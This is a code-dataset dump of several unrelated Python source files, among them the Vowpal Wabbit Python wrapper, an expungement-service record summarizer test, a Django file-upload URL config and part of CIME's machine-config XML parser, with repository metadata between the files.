namespace. feature can either be an integer (already a feature
id) or a string, in which case it is hashed. Note that if
--hash all is on, then get_feature_id(ns,"5") !=
get_feature_id(ns, 5). If you've already hashed the namespace,
you can optionally provide that value to avoid re-hashing it."""
if isinstance(feature, int):
return feature
if isinstance(feature, str):
if ns_hash is None:
ns_hash = self.vw.hash_space( self.get_ns(ns).ns )
return self.vw.hash_feature(feature, ns_hash)
raise Exception("cannot extract feature of type: " + str(type(feature)))
def push_hashed_feature(self, ns, f, v=1.):
"""Add a hashed feature to a given namespace."""
if self.setup_done: self.unsetup_example();
pylibvw.example.push_hashed_feature(self, self.get_ns(ns).ord_ns, f, v)
def push_feature(self, ns, feature, v=1., ns_hash=None):
"""Add an unhashed feature to a given namespace."""
f = self.get_feature_id(ns, feature, ns_hash)
self.push_hashed_feature(ns, f, v)
def pop_feature(self, ns):
"""Remove the top feature from a given namespace; returns True
if a feature was removed, returns False if there were no
features to pop."""
if self.setup_done: self.unsetup_example();
return pylibvw.example.pop_feature(self, self.get_ns(ns).ord_ns)
def push_namespace(self, ns):
"""Push a new namespace onto this example. You should only do
this if you're sure that this example doesn't already have the
given namespace."""
if self.setup_done: self.unsetup_example();
pylibvw.example.push_namespace(self, self.get_ns(ns).ord_ns)
def pop_namespace(self):
"""Remove the top namespace from an example; returns True if a
namespace was removed, or False if there were no namespaces
left."""
if self.setup_done: self.unsetup_example();
return pylibvw.example.pop_namespace(self)
def ensure_namespace_exists(self, ns):
"""Check to see if a namespace already exists. If it does, do
nothing. If it doesn't, add it."""
if self.setup_done: self.unsetup_example();
return pylibvw.example.ensure_namespace_exists(self, self.get_ns(ns).ord_ns)
def push_features(self, ns, featureList):
"""Push a list of features to a given namespace. Each feature
in the list can either be an integer (already hashed) or a
string (to be hashed) and may be paired with a value or not
(if not, the value is assumed to be 1.0).
Examples:
ex.push_features('x', ['a', 'b'])
ex.push_features('y', [('c', 1.), 'd'])
space_hash = vw.hash_space( 'x' )
feat_hash = vw.hash_feature( 'a', space_hash )
ex.push_features('x', [feat_hash]) # note: 'x' should match the space_hash!
"""
ns = self.get_ns(ns)
self.ensure_namespace_exists(ns)
self.push_feature_list(self.vw, ns.ord_ns, featureList) # much faster just to do it in C++
# ns_hash = self.vw.hash_space( ns.ns )
# for feature in featureList:
# if isinstance(feature, int) or isinstance(feature, str):
# f = feature
# v = 1.
# elif isinstance(feature, tuple) and len(feature) == 2 and (isinstance(feature[0], int) or isinstance(feature[0], str)) and (isinstance(feature[1], int) or isinstance(feature[1], float)):
# f = feature[0]
# v = feature[1]
# else:
# raise Exception('malformed feature to push of type: ' + str(type(feature)))
# self.push_feature(ns, f, v, ns_hash)
def finish(self):
"""Tell VW that you're done with this example and it can
recycle it for later use."""
if not self.finished:
self.vw.finish_example(self)
self.finished = True
def iter_features(self):
"""Iterate over all feature/value pairs in this example (all
namespace included)."""
for ns_id in range( self.num_namespaces() ): # iterate over every namespace
ns = self.get_ns(ns_id)
for i in range(self.num_features_in(ns)):
f = self.feature(ns, i)
v = self.feature_weight(ns, i)
yield f,v
def get_label(self, label_class=simple_label):
"""Given a known label class (default is simple_label), get
the corresponding label structure for this example."""
return label_class(self)
def get_topics(self):
"""Return a vector of LDA topic weights for this example"""
n = self.vw.lda()
if n > 0:
return [self.get_topic_prediction(i) for i in range(n)]
else:
return None
#help(example)
| 43.186885 | 238 | 0.602984 | import sys
import pylibvw
class SearchTask():
def __init__(self, vw, sch, num_actions):
self.vw = vw
self.sch = sch
self.blank_line = self.vw.example("")
self.blank_line.finish()
self.bogus_example = self.vw.example("1 | x")
def __del__(self):
self.bogus_example.finish()
pass
def _run(self, your_own_input_example):
pass
def _call_vw(self, my_example, isTest, useOracle=False):
self._output = None
self.bogus_example.set_test_only(isTest)
def run(): self._output = self._run(my_example)
setup = None
takedown = None
if callable(getattr(self, "_setup", None)): setup = lambda: self._setup(my_example)
if callable(getattr(self, "_takedown", None)): takedown = lambda: self._takedown(my_example)
self.sch.set_structured_predict_hook(run, setup, takedown)
self.sch.set_force_oracle(useOracle)
self.vw.learn(self.bogus_example)
self.vw.learn(self.blank_line)
def learn(self, data_iterator):
for my_example in data_iterator.__iter__():
self._call_vw(my_example, isTest=False);
def example(self, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
if self.sch.predict_needs_example():
return self.vw.example(initStringOrDict, labelType)
else:
return self.vw.example(None, labelType)
def predict(self, my_example, useOracle=False):
self._call_vw(my_example, isTest=True, useOracle=useOracle);
return self._output
class vw(pylibvw.vw):
def __init__(self, argString=None, **kw):
def format(key,val):
if type(val) is bool and val == False: return ''
s = ('-'+key) if len(key) == 1 else ('--'+key)
if type(val) is not bool or val != True: s += ' ' + str(val)
return s
l = [format(k,v) for k,v in kw.iteritems()]
if argString is not None: l = [argString] + l
pylibvw.vw.__init__(self,' '.join(l))
self.finished = False
def get_weight(self, index, offset=0):
return pylibvw.vw.get_weight(self, index, offset)
def learn(self, ec):
if isinstance(ec, str):
self.learn_string(ec)
else:
if hasattr(ec, 'setup_done') and not ec.setup_done:
ec.setup_example()
pylibvw.vw.learn(self, ec)
def finish(self):
if not self.finished:
pylibvw.vw.finish(self)
self.finished = True
def example(self, stringOrDict=None, labelType=pylibvw.vw.lDefault):
return example(self, stringOrDict, labelType)
def __del__(self):
self.finish()
def init_search_task(self, search_task, task_data=None):
sch = self.get_search_ptr()
def predict(examples, my_tag, oracle, condition=None, allowed=None, learner_id=0):
P = sch.get_predictor(my_tag)
if sch.is_ldf():
while hasattr(examples, '__call__'): examples = examples()
if not isinstance(examples, list): raise TypeError('expected example _list_ in LDF mode for SearchTask.predict()')
P.set_input_length(len(examples))
if sch.predict_needs_example():
for n in range(len(examples)):
ec = examples[n]
while hasattr(ec, '__call__'): ec = ec() # unfold the lambdas
if not isinstance(ec, example) and not isinstance(ec, pylibvw.example): raise TypeError('non-example in LDF example list in SearchTask.predict()')
if hasattr(ec, 'setup_done') and not ec.setup_done:
ec.setup_example()
P.set_input_at(n, ec)
else:
pass # TODO: do we need to set the examples even though they're not used?
else:
if sch.predict_needs_example():
while hasattr(examples, '__call__'): examples = examples()
if hasattr(examples, 'setup_done') and not examples.setup_done:
examples.setup_example()
P.set_input(examples)
else:
pass
# if (isinstance(examples, list) and all([isinstance(ex, example) or isinstance(ex, pylibvw.example) for ex in examples])) or \
# isinstance(examples, example) or isinstance(examples, pylibvw.example):
# if isinstance(examples, list): # LDF
# P.set_input_length(len(examples))
# for n in range(len(examples)):
# P.set_input_at(n, examples[n])
# else: # non-LDF
# P.set_input(examples)
if True: # TODO: get rid of this
if oracle is None: pass
elif isinstance(oracle, list):
if len(oracle) > 0: P.set_oracles(oracle)
elif isinstance(oracle, int): P.set_oracle(oracle)
else: raise TypeError('expecting oracle to be a list or an integer')
if condition is not None:
if not isinstance(condition, list): condition = [condition]
for c in condition:
if not isinstance(c, tuple): raise TypeError('item ' + str(c) + ' in condition list is malformed')
if len(c) == 2 and isinstance(c[0], int) and isinstance(c[1], str) and len(c[1]) == 1:
P.add_condition(max(0, c[0]), c[1])
elif len(c) == 3 and isinstance(c[0], int) and isinstance(c[1], int) and isinstance(c[2], str) and len(c[2]) == 1:
P.add_condition_range(max(0,c[0]), max(0,c[1]), c[2])
else:
raise TypeError('item ' + str(c) + ' in condition list malformed')
if allowed is None: pass
elif isinstance(allowed, list):
P.set_alloweds(allowed)
else: raise TypeError('allowed argument wrong type')
if learner_id != 0: P.set_learner_id(learner_id)
p = P.predict()
return p
else:
raise TypeError("'examples' should be a pyvw example (or a pylibvw example), or a list of said things")
sch.predict = predict
num_actions = sch.get_num_actions()
return search_task(self, sch, num_actions) if task_data is None else search_task(self, sch, num_actions, task_data)
class namespace_id():
def __init__(self, ex, id):
if isinstance(id, int): # you've specified a namespace by index
if id < 0 or id >= ex.num_namespaces():
raise Exception('namespace ' + str(id) + ' out of bounds')
self.id = id
self.ord_ns = ex.namespace(id)
self.ns = chr(self.ord_ns)
elif isinstance(id, str):
if len(id) == 0:
id = ' '
self.id = None # we don't know and we don't want to do the linear search requered to find it
self.ns = id[0]
self.ord_ns = ord(self.ns)
else:
raise Exception("ns_to_characterord failed because id type is unknown: " + str(type(id)))
class example_namespace():
def __init__(self, ex, ns, ns_hash=None):
if not isinstance(ns, namespace_id):
raise TypeError
self.ex = ex
self.ns = ns
self.ns_hash = None
def num_features_in(self):
return self.ex.num_features_in(self.ns)
def __getitem__(self, i):
f = self.ex.feature(self.ns, i)
v = self.ex.feature_weight(self.ns, i)
return (f, v)
def iter_features(self):
for i in range(self.num_features_in()):
yield self[i]
def push_feature(self, feature, v=1.):
if self.ns_hash is None:
self.ns_hash = self.ex.vw.hash_space( self.ns )
self.ex.push_feature(self.ns, feature, v, self.ns_hash)
def pop_feature(self):
return self.ex.pop_feature(self.ns)
def push_features(self, ns, featureList):
self.ex.push_features(self.ns, featureList)
class abstract_label:
def __init__(self):
pass
def from_example(self, ex):
raise Exception("from_example not yet implemented")
class simple_label(abstract_label):
def __init__(self, label=0., weight=1., initial=0., prediction=0.):
abstract_label.__init__(self)
if isinstance(label, example):
self.from_example(label)
else:
self.label = label
self.weight = weight
self.initial = initial
self.prediction = prediction
def from_example(self, ex):
self.label = ex.get_simplelabel_label()
self.weight = ex.get_simplelabel_weight()
self.initial = ex.get_simplelabel_initial()
self.prediction = ex.get_simplelabel_prediction()
def __str__(self):
s = str(self.label)
if self.weight != 1.:
s += ':' + self.weight
return s
class multiclass_label(abstract_label):
def __init__(self, label=1, weight=1., prediction=1):
abstract_label.__init__(self)
self.label = label
self.weight = weight
self.prediction = prediction
def from_example(self, ex):
self.label = ex.get_multiclass_label()
self.weight = ex.get_multiclass_weight()
self.prediction = ex.get_multiclass_prediction()
def __str__(self):
s = str(self.label)
if self.weight != 1.:
s += ':' + self.weight
return s
class cost_sensitive_label(abstract_label):
class wclass:
def __init__(self, label, cost=0., partial_prediction=0., wap_value=0.):
self.label = label
self.cost = cost
self.partial_prediction = partial_prediction
self.wap_value = wap_value
def __init__(self, costs=[], prediction=0):
abstract_label.__init__(self)
self.costs = costs
self.prediction = prediction
def from_example(self, ex):
self.prediction = ex.get_costsensitive_prediction()
self.costs = []
for i in range(ex.get_costsensitive_num_costs):
wc = wclass(ex.get_costsensitive_class(),
ex.get_costsensitive_cost(),
ex.get_costsensitive_partial_prediction(),
ex.get_costsensitive_wap_value())
self.costs.append(wc)
def __str__(self):
return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs])
class cbandits_label(abstract_label):
class wclass:
def __init__(self, label, cost=0., partial_prediction=0., probability=0.):
self.label = label
self.cost = cost
self.partial_prediction = partial_prediction
self.probability = probability
def __init__(self, costs=[], prediction=0):
abstract_label.__init__(self)
self.costs = costs
self.prediction = prediction
def from_example(self, ex):
self.prediction = ex.get_cbandits_prediction()
self.costs = []
for i in range(ex.get_cbandits_num_costs):
wc = wclass(ex.get_cbandits_class(),
ex.get_cbandits_cost(),
ex.get_cbandits_partial_prediction(),
ex.get_cbandits_probability())
self.costs.append(wc)
def __str__(self):
return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs])
class example(pylibvw.example):
def __init__(self, vw, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
while hasattr(initStringOrDict, '__call__'):
initStringOrDict = initStringOrDict()
if initStringOrDict is None:
pylibvw.example.__init__(self, vw, labelType)
self.setup_done = False
elif isinstance(initStringOrDict, str):
pylibvw.example.__init__(self, vw, labelType, initStringOrDict)
self.setup_done = True
elif isinstance(initStringOrDict, dict):
pylibvw.example.__init__(self, vw, labelType)
self.vw = vw
self.stride = vw.get_stride()
self.finished = False
self.push_feature_dict(vw, initStringOrDict)
self.setup_done = False
else:
raise TypeError('expecting string or dict as argument for example construction')
self.vw = vw
self.stride = vw.get_stride()
self.finished = False
self.labelType = labelType
def __del__(self):
self.finish()
def __enter__(self):
return self
def __exit__(self,typ,value,traceback):
self.finish()
return typ is None
def get_ns(self, id):
if isinstance(id, namespace_id):
return id
else:
return namespace_id(self, id)
def __getitem__(self, id):
return example_namespace(self, self.get_ns(id))
def feature(self, ns, i):
ns = self.get_ns(ns) # guaranteed to be a single character
f = pylibvw.example.feature(self, ns.ord_ns, i)
if self.setup_done:
f = (f - self.get_ft_offset()) / self.stride
return f
def feature_weight(self, ns, i):
return pylibvw.example.feature_weight(self, self.get_ns(ns).ord_ns, i)
def set_label_string(self, string):
pylibvw.example.set_label_string(self, self.vw, string, self.labelType)
def setup_example(self):
if self.setup_done:
raise Exception('trying to setup_example on an example that is already setup')
self.vw.setup_example(self)
self.setup_done = True
def unsetup_example(self):
if not self.setup_done:
raise Exception('trying to unsetup_example that has not yet been setup')
self.vw.unsetup_example(self)
self.setup_done = False
def learn(self):
if not self.setup_done:
self.setup_example()
self.vw.learn(self)
def sum_feat_sq(self, ns):
return pylibvw.example.sum_feat_sq(self, self.get_ns(ns).ord_ns)
def num_features_in(self, ns):
return pylibvw.example.num_features_in(self, self.get_ns(ns).ord_ns)
def get_feature_id(self, ns, feature, ns_hash=None):
if isinstance(feature, int):
return feature
if isinstance(feature, str):
if ns_hash is None:
ns_hash = self.vw.hash_space( self.get_ns(ns).ns )
return self.vw.hash_feature(feature, ns_hash)
raise Exception("cannot extract feature of type: " + str(type(feature)))
def push_hashed_feature(self, ns, f, v=1.):
if self.setup_done: self.unsetup_example();
pylibvw.example.push_hashed_feature(self, self.get_ns(ns).ord_ns, f, v)
def push_feature(self, ns, feature, v=1., ns_hash=None):
f = self.get_feature_id(ns, feature, ns_hash)
self.push_hashed_feature(ns, f, v)
def pop_feature(self, ns):
if self.setup_done: self.unsetup_example();
return pylibvw.example.pop_feature(self, self.get_ns(ns).ord_ns)
def push_namespace(self, ns):
if self.setup_done: self.unsetup_example();
pylibvw.example.push_namespace(self, self.get_ns(ns).ord_ns)
def pop_namespace(self):
if self.setup_done: self.unsetup_example();
return pylibvw.example.pop_namespace(self)
def ensure_namespace_exists(self, ns):
if self.setup_done: self.unsetup_example();
return pylibvw.example.ensure_namespace_exists(self, self.get_ns(ns).ord_ns)
def push_features(self, ns, featureList):
ns = self.get_ns(ns)
self.ensure_namespace_exists(ns)
self.push_feature_list(self.vw, ns.ord_ns, featureList) # much faster just to do it in C++
# ns_hash = self.vw.hash_space( ns.ns )
# for feature in featureList:
# if isinstance(feature, int) or isinstance(feature, str):
# f = feature
# v = 1.
# elif isinstance(feature, tuple) and len(feature) == 2 and (isinstance(feature[0], int) or isinstance(feature[0], str)) and (isinstance(feature[1], int) or isinstance(feature[1], float)):
# f = feature[0]
# v = feature[1]
# else:
# raise Exception('malformed feature to push of type: ' + str(type(feature)))
# self.push_feature(ns, f, v, ns_hash)
def finish(self):
if not self.finished:
self.vw.finish_example(self)
self.finished = True
def iter_features(self):
for ns_id in range( self.num_namespaces() ): # iterate over every namespace
ns = self.get_ns(ns_id)
for i in range(self.num_features_in(ns)):
f = self.feature(ns, i)
v = self.feature_weight(ns, i)
yield f,v
def get_label(self, label_class=simple_label):
return label_class(self)
def get_topics(self):
n = self.vw.lda()
if n > 0:
return [self.get_topic_prediction(i) for i in range(n)]
else:
return None
#help(example)
| true | true |
f725dd2723a8f6af9c7f472d8dd8cc02232f81ab | 5,239 | py | Python | src/backend/tests/models/test_record_summarizer.py | Ark20/recordexpungPDX | 2b76b3f5284e8ce572942cc58c9a4577442036fe | [
"MIT"
] | null | null | null | src/backend/tests/models/test_record_summarizer.py | Ark20/recordexpungPDX | 2b76b3f5284e8ce572942cc58c9a4577442036fe | [
"MIT"
] | null | null | null | src/backend/tests/models/test_record_summarizer.py | Ark20/recordexpungPDX | 2b76b3f5284e8ce572942cc58c9a4577442036fe | [
"MIT"
] | null | null | null | from expungeservice.models.disposition import DispositionCreator
from expungeservice.record_merger import RecordMerger
from expungeservice.record_summarizer import RecordSummarizer
from expungeservice.expunger import Expunger
from expungeservice.models.record import Record
from tests.factories.case_factory import CaseFactory
from tests.factories.charge_factory import ChargeFactory
from expungeservice.util import DateWithFuture as date
def test_record_summarizer_multiple_cases():
case_all_eligible = CaseFactory.create(
case_number="1",
balance="100.00",
date_location=["1/1/1995", "Multnomah"],
charges=tuple(
[
ChargeFactory.create(
case_number="1",
name="Theft of dignity",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_partially_eligible = CaseFactory.create(
case_number="2",
balance="200.00",
date_location=["1/1/1995", "Clackamas"],
charges=tuple(
[
ChargeFactory.create(
case_number="2", disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
),
ChargeFactory.create(
case_number="2",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
),
]
),
)
case_possibly_eligible = CaseFactory.create(
case_number="3",
balance="300.00",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="3",
level="Felony Class B",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_all_ineligible = CaseFactory.create(
case_number="4",
balance="400.00",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="4",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_all_ineligible_2 = CaseFactory.create(
case_number="5",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="5",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
record = Record(
tuple(
[
case_all_eligible,
case_partially_eligible,
case_possibly_eligible,
case_all_ineligible,
case_all_ineligible_2,
]
)
)
expunger_result = Expunger.run(record)
merged_record = RecordMerger.merge([record], [expunger_result], [])
record_summary = RecordSummarizer.summarize(merged_record, {})
assert record_summary.total_balance_due == 1000.00
assert record_summary.total_cases == 5
assert record_summary.total_charges == 6
assert record_summary.eligible_charges_by_date == {
"Eligible Jan 1, 2030": [
(
case_possibly_eligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, " "2010",
)
],
"Eligible Now": [
(case_all_eligible.charges[0].ambiguous_charge_id, "Theft of dignity (CONVICTED) - Charged Jan 1, 2010"),
(
case_partially_eligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
],
"Ineligible": [
(
case_partially_eligible.charges[1].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
(
case_all_ineligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
(
case_all_ineligible_2.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
],
}
"""
assert record_summary.county_balances["Baker"] == 700.00
assert record_summary.county_balances["Multnomah"] == 100.00
assert record_summary.county_balances["Clackamas"] == 200.00
"""
def test_record_summarizer_no_cases():
record = Record(tuple([]))
record_summary = RecordSummarizer.summarize(record, {})
assert record_summary.total_balance_due == 0.00
assert record_summary.total_cases == 0
assert record_summary.total_charges == 0
assert record_summary.county_balances == []
assert record_summary.eligible_charges_by_date == {}
| 34.24183 | 118 | 0.564993 | from expungeservice.models.disposition import DispositionCreator
from expungeservice.record_merger import RecordMerger
from expungeservice.record_summarizer import RecordSummarizer
from expungeservice.expunger import Expunger
from expungeservice.models.record import Record
from tests.factories.case_factory import CaseFactory
from tests.factories.charge_factory import ChargeFactory
from expungeservice.util import DateWithFuture as date
def test_record_summarizer_multiple_cases():
case_all_eligible = CaseFactory.create(
case_number="1",
balance="100.00",
date_location=["1/1/1995", "Multnomah"],
charges=tuple(
[
ChargeFactory.create(
case_number="1",
name="Theft of dignity",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_partially_eligible = CaseFactory.create(
case_number="2",
balance="200.00",
date_location=["1/1/1995", "Clackamas"],
charges=tuple(
[
ChargeFactory.create(
case_number="2", disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
),
ChargeFactory.create(
case_number="2",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
),
]
),
)
case_possibly_eligible = CaseFactory.create(
case_number="3",
balance="300.00",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="3",
level="Felony Class B",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_all_ineligible = CaseFactory.create(
case_number="4",
balance="400.00",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="4",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
case_all_ineligible_2 = CaseFactory.create(
case_number="5",
date_location=["1/1/1995", "Baker"],
charges=tuple(
[
ChargeFactory.create(
case_number="5",
level="Felony Class A",
disposition=DispositionCreator.create(ruling="Convicted", date=date(2010, 1, 1)),
)
]
),
)
record = Record(
tuple(
[
case_all_eligible,
case_partially_eligible,
case_possibly_eligible,
case_all_ineligible,
case_all_ineligible_2,
]
)
)
expunger_result = Expunger.run(record)
merged_record = RecordMerger.merge([record], [expunger_result], [])
record_summary = RecordSummarizer.summarize(merged_record, {})
assert record_summary.total_balance_due == 1000.00
assert record_summary.total_cases == 5
assert record_summary.total_charges == 6
assert record_summary.eligible_charges_by_date == {
"Eligible Jan 1, 2030": [
(
case_possibly_eligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, " "2010",
)
],
"Eligible Now": [
(case_all_eligible.charges[0].ambiguous_charge_id, "Theft of dignity (CONVICTED) - Charged Jan 1, 2010"),
(
case_partially_eligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
],
"Ineligible": [
(
case_partially_eligible.charges[1].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
(
case_all_ineligible.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
(
case_all_ineligible_2.charges[0].ambiguous_charge_id,
"Theft of services (CONVICTED) - Charged Jan 1, 2010",
),
],
}
def test_record_summarizer_no_cases():
record = Record(tuple([]))
record_summary = RecordSummarizer.summarize(record, {})
assert record_summary.total_balance_due == 0.00
assert record_summary.total_cases == 0
assert record_summary.total_charges == 0
assert record_summary.county_balances == []
assert record_summary.eligible_charges_by_date == {}
| true | true |
f725dd3b8236c64cc62c4c8f8e6178ceb94eea3c | 32 | py | Python | packages/w3af/w3af/plugins/tests/output/test_console.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/plugins/tests/output/test_console.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/plugins/tests/output/test_console.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
@see: test_consoleui.py
"""
| 8 | 23 | 0.59375 | true | true | |
f725dd3e3ae97ac6d8f564d676e5f24bde3c982a | 486 | py | Python | FileStorage/sf_file/urls.py | Thiefxt/FileStorage | db2882b2ea861f4412cb453edef6439501b13705 | [
"MIT"
] | 1 | 2020-07-15T10:02:40.000Z | 2020-07-15T10:02:40.000Z | FileStorage/sf_file/urls.py | Thiefxt/FileStorage | db2882b2ea861f4412cb453edef6439501b13705 | [
"MIT"
] | null | null | null | FileStorage/sf_file/urls.py | Thiefxt/FileStorage | db2882b2ea861f4412cb453edef6439501b13705 | [
"MIT"
] | null | null | null | """
@Author : xiaotao
@Email : 18773993654@163.com
@Lost modifid : 2020/4/24 10:06
@Filename : urls.py
@Description :
@Software : PyCharm
"""
from django.urls import path
from sf_file.views import file_management
urlpatterns = [
path("test", file_management.Test.as_view()), # 测试运行
path("upload", file_management.FileUpload.as_view()), # 文件上传
]
| 25.578947 | 114 | 0.520576 | from django.urls import path
from sf_file.views import file_management
urlpatterns = [
path("test", file_management.Test.as_view()),
path("upload", file_management.FileUpload.as_view()),
]
| true | true |
f725ddb7c782aa8c33226416d2d64b83c212aa9f | 13,370 | py | Python | cime/scripts/lib/CIME/XML/machines.py | cjvogl/E3SM | d8990bc2efda76b6f9096f989eed46bd3ab87463 | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2019-12-11T16:41:13.000Z | 2019-12-11T16:41:13.000Z | cime/scripts/lib/CIME/XML/machines.py | cjvogl/E3SM | d8990bc2efda76b6f9096f989eed46bd3ab87463 | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | cime/scripts/lib/CIME/XML/machines.py | cjvogl/E3SM | d8990bc2efda76b6f9096f989eed46bd3ab87463 | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | """
Interface to the config_machines.xml file. This class inherits from GenericXML.py
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.generic_xml import GenericXML
from CIME.XML.files import Files
from CIME.utils import convert_to_unknown_type, get_cime_config
import socket
logger = logging.getLogger(__name__)
class Machines(GenericXML):
def __init__(self, infile=None, files=None, machine=None):
"""
initialize an object
if a filename is provided it will be used,
otherwise if a files object is provided it will be used
otherwise create a files object from default values
"""
self.machine_node = None
self.machine = None
self.machines_dir = None
schema = None
if files is None:
files = Files()
if infile is None:
infile = files.get_value("MACHINES_SPEC_FILE")
schema = files.get_schema("MACHINES_SPEC_FILE")
logger.debug("Verifying using schema {}".format(schema))
self.machines_dir = os.path.dirname(infile)
GenericXML.__init__(self, infile, schema)
# Append the contents of $HOME/.cime/config_machines.xml if it exists
# This could cause problems if node matchs are repeated when only one is expected
local_infile = os.path.join(os.environ.get("HOME"),".cime","config_machines.xml")
logger.debug("Infile: {}".format(local_infile))
if os.path.exists(local_infile):
GenericXML.read(self, local_infile, schema)
if machine is None:
if "CIME_MACHINE" in os.environ:
machine = os.environ["CIME_MACHINE"]
else:
cime_config = get_cime_config()
if cime_config.has_option("main", "machine"):
machine = cime_config.get("main", "machine")
if machine is None:
machine = self.probe_machine_name()
expect(machine is not None, "Could not initialize machine object from {} or {}".format(infile, local_infile))
self.set_machine(machine)
def get_child(self, name=None, attributes=None, root=None, err_msg=None):
if root is None:
root = self.machine_node
return super(Machines, self).get_child(name, attributes, root, err_msg)
def get_machines_dir(self):
"""
Return the directory of the machines file
"""
return self.machines_dir
def get_machine_name(self):
"""
Return the name of the machine
"""
return self.machine
def get_node_names(self):
"""
Return the names of all the child nodes for the target machine
"""
nodes = self.get_children(root=self.machine_node)
node_names = []
for node in nodes:
node_names.append(self.name(node))
return node_names
def get_first_child_nodes(self, nodename):
"""
Return the names of all the child nodes for the target machine
"""
nodes = self.get_children(nodename, root=self.machine_node)
return nodes
def list_available_machines(self):
"""
Return a list of machines defined for a given CIME_MODEL
"""
machines = []
nodes = self.get_children("machine")
for node in nodes:
mach = self.get(node, "MACH")
machines.append(mach)
return machines
def probe_machine_name(self, warn=True):
"""
Find a matching regular expression for hostname
in the NODENAME_REGEX field in the file. First match wins.
"""
names_not_found = []
nametomatch = socket.getfqdn()
machine = self._probe_machine_name_one_guess(nametomatch)
if machine is None:
names_not_found.append(nametomatch)
nametomatch = socket.gethostname()
machine = self._probe_machine_name_one_guess(nametomatch)
if machine is None:
names_not_found.append(nametomatch)
names_not_found_quoted = ["'" + name + "'" for name in names_not_found]
names_not_found_str = ' or '.join(names_not_found_quoted)
if warn:
logger.warning("Could not find machine match for {}".format(names_not_found_str))
return machine
def _probe_machine_name_one_guess(self, nametomatch):
"""
Find a matching regular expression for nametomatch in the NODENAME_REGEX
field in the file. First match wins. Returns None if no match is found.
"""
machine = None
nodes = self.get_children("machine")
for node in nodes:
machtocheck = self.get(node, "MACH")
logger.debug("machine is " + machtocheck)
regex_str_node = self.get_optional_child("NODENAME_REGEX", root=node)
regex_str = machtocheck if regex_str_node is None else self.text(regex_str_node)
if regex_str is not None:
logger.debug("machine regex string is " + regex_str)
regex = re.compile(regex_str)
if regex.match(nametomatch):
logger.debug("Found machine: {} matches {}".format(machtocheck, nametomatch))
machine = machtocheck
break
return machine
def set_machine(self, machine):
"""
Sets the machine block in the Machines object
>>> machobj = Machines(machine="melvin")
>>> machobj.get_machine_name()
'melvin'
>>> machobj.set_machine("trump")
Traceback (most recent call last):
...
SystemExit: ERROR: No machine trump found
"""
if machine == "Query":
self.machine = machine
elif self.machine != machine or self.machine_node is None:
self.machine_node = super(Machines,self).get_child("machine", {"MACH" : machine}, err_msg="No machine {} found".format(machine))
self.machine = machine
return machine
#pylint: disable=arguments-differ
def get_value(self, name, attributes=None, resolved=True, subgroup=None):
"""
Get Value of fields in the config_machines.xml file
"""
expect(self.machine_node is not None, "Machine object has no machine defined")
expect(subgroup is None, "This class does not support subgroups")
value = None
# COMPILER and MPILIB are special, if called without arguments they get the default value from the
# COMPILERS and MPILIBS lists in the file.
if name == "COMPILER":
value = self.get_default_compiler()
elif name == "MPILIB":
value = self.get_default_MPIlib(attributes)
else:
node = self.get_optional_child(name, root=self.machine_node, attributes=attributes)
if node is not None:
value = self.text(node)
if resolved:
if value is not None:
value = self.get_resolved_value(value)
elif name in os.environ:
value = os.environ[name]
value = convert_to_unknown_type(value)
return value
def get_field_from_list(self, listname, reqval=None, attributes=None):
"""
Some of the fields have lists of valid values in the xml, parse these
lists and return the first value if reqval is not provided and reqval
if it is a valid setting for the machine
"""
expect(self.machine_node is not None, "Machine object has no machine defined")
